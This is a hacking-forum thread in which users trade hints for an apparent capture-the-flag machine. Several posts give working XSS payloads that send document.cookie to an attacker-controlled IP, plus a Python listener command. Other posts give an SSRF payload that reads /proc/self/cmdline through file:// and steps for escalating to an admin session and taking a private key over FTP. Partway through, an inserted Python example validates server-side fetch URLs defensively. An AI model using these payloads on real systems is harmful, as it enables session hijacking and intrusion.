Posts: 44
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 12:47 PM)ticklemeelmo Wrote: Wait... What is the step after getting the Flask Secret Key??
Find other source files
Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 09:22 AM)jsvensson Wrote: (Apr 28, 2024, 09:16 AM)vanatka123 Wrote: (Apr 28, 2024, 07:34 AM)andlommy Wrote: user, finally
use the SSRF to find application code
use that same ssrf to access the next hop (http is not the only protocol)
convert key
profit.
now for the root....
How do you know the location of the source code?
use file:///proc/self/cmdline
Hello guys,
I'm currently stuck for a few hours on the SSRF....
I did this but even though I tried so many payloads I got "unexpected error"...
I put a space before file, but even when I send this to the server I get an error.
Anyone have a little hint please?
<html>
<body>
<h1>Proof that you Signed Your Life Away</h1>
<img src=""><body id="body"> <script>jsImg = new Image();jsImg.src=" file:///proc/self/cmdline";document.getElementById("body").appendChild(jsImg);</script></body></img>
</body>
</html>
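Seen from the defending side, the hints above (non-HTTP schemes such as file://, and a space placed before the scheme) describe a server-side fetcher that filters URLs by prefix. The following is an added example, not code from any post in this thread or from the target application: a weak prefix blocklist beside an allowlist validator. The names `validate_fetch_url`, `naive_is_blocked`, `fake_resolve` and the `FAKE_DNS` table are hypothetical and constructed for illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Constructed name-to-address table so the example runs offline (not real DNS data).
FAKE_DNS = {"reports.example": "93.184.216.34", "internal.example": "10.0.0.5"}

def fake_resolve(host, port, **_):
    """Stand-in for socket.getaddrinfo backed by FAKE_DNS (hypothetical helper)."""
    ip = host if host not in FAKE_DNS else FAKE_DNS[host]
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))]

def naive_is_blocked(url):
    """Prefix blocklist of the kind a leading space slips past (the weak check)."""
    return url.lower().startswith(("file://", "ftp://", "gopher://"))

def validate_fetch_url(url, resolve=socket.getaddrinfo):
    """Return the URL if a server-side fetch may use it, else raise ValueError."""
    # Reject before parsing: urlsplit behaviour on leading blanks varies by version.
    if any(ord(c) <= 0x20 or ord(c) == 0x7F for c in url):
        raise ValueError("whitespace or control character in URL")
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:  # allowlist: file, ftp, gopher all fail here
        raise ValueError(f"scheme not allowed: {scheme!r}")
    if not parts.hostname or parts.username or parts.password:
        raise ValueError("missing host or embedded credentials")
    port = parts.port or (443 if scheme == "https" else 80)
    for info in resolve(parts.hostname, port, type=socket.SOCK_STREAM):
        addr = ipaddress.ip_address(info[4][0])
        if not addr.is_global:  # loopback, RFC 1918, link-local, metadata ranges
            raise ValueError(f"{parts.hostname} resolves to non-public {addr}")
    return parts.geturl()

def rejected(url):
    """True when validate_fetch_url refuses the URL (uses the offline resolver)."""
    try:
        validate_fetch_url(url, resolve=fake_resolve)
    except ValueError:
        return True
    return False

if __name__ == "__main__":
    for u in ("file:///proc/self/cmdline", " file:///proc/self/cmdline",
              "ftp://internal.example/x", "http://127.0.0.1/", "https://reports.example/a.png"):
        print(repr(u), "naive-blocked:", naive_is_blocked(u), "rejected:", rejected(u))
```

Validation alone does not cover redirects or DNS rebinding: the fetcher should connect to the address that was checked and re-validate every redirect target.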
Posts: 103
Threads: 1
Joined: Nov 2023
guys, what is the code for returning the cookie? T_T
Posts: 28
Threads: 0
Joined: Jan 2024
[quote="fuliye" pid='587786' dateline='1714309846']
guys, what is the code for returning the cookie? T_T
[/quote]
1º listener = python3 -m http.server 80
2º = <script>var i=new Image(); i.src=" http://10.10.xx.xx:80/?cookie="+btoa(document.cookie);</script>
and then waiting for the python server to capture the cookie can take some time.... patience
Posts: 2
Threads: 0
Joined: Apr 2024
You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stuck now as root inside a container. Does anyone know how to break out?
Posts: 219
Threads: 14
Joined: Apr 2024
(Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stuck now as root inside a container. Does anyone know how to break out?
Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain
Posts: 31
Threads: 0
Joined: Oct 2023
I found out that there is a ftp connection, do I need to use this connection to get the private key?
Posts: 44
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 01:47 PM)query1338 Wrote: I found out that there is a ftp connection, do I need to use this connection to get the private key?
yes you use these creds to get the private key for user
Posts: 2
Threads: 0
Joined: Apr 2024
(Apr 28, 2024, 01:45 PM)osamy7593 Wrote: (Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stuck now as root inside a container. Does anyone know how to break out?
Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain
Sure, there is another thing to do.
First you receive a cookie for user called "adam". When you access like adam inside the dashboard, you can change reports priority.
Now, send again the XSS and quickly update the priority to 1.
There you go, the second request with the new cookie as "admin".
Posts: 219
Threads: 14
Joined: Apr 2024
(Apr 28, 2024, 01:50 PM)ConnorHack Wrote: (Apr 28, 2024, 01:45 PM)osamy7593 Wrote: (Apr 28, 2024, 01:42 PM)ConnorHack Wrote: You can just use this as description:
<img src=x onerror=fetch('http://10.10.X.X:8000/'+document.cookie);>
Wait listening with python3 -m http.server
---
I'm stuck now as root inside a container. Does anyone know how to break out?
Bro we use ssrf to get the private key after getting the cookie or what is the next step .. I saw someone said there is another cookie for whom ? Can u explain
Sure, there is another thing to do.
First you receive a cookie for user called "adam". When you access like adam inside the dashboard, you can change reports priority.
Now, send again the XSS and quickly update the priority to 1.
There you go, the second request with the new cookie as "admin".
Thx man